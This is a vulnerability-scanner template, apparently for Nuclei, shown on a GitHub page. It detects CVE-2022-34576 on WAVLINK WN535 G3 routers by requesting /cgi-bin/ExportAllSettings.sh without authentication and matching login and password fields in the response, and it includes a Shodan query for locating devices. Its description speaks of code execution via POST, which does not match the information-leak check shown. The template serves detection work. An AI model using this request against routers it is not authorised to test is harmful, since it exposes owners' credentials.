-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2022-34576.yaml
38 lines (34 loc) · 1.02 KB
/
CVE-2022-34576.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
id: CVE-2022-34576
info:
name: WAVLINK WN535 G3 - Access Control
author: arafatansari
severity: high
description: |
A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to execute arbitrary code via a crafted POST request.
reference:
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-34576
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34576
metadata:
shodan-query: http.html:"Wavlink"
verified: "true"
tags: cve,cve2022,wavlink,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
matchers-condition: and
matchers:
- type: word
words:
- 'Login='
- 'Password='
- 'Model='
- 'AuthMode='
condition: and
- type: status
status:
- 200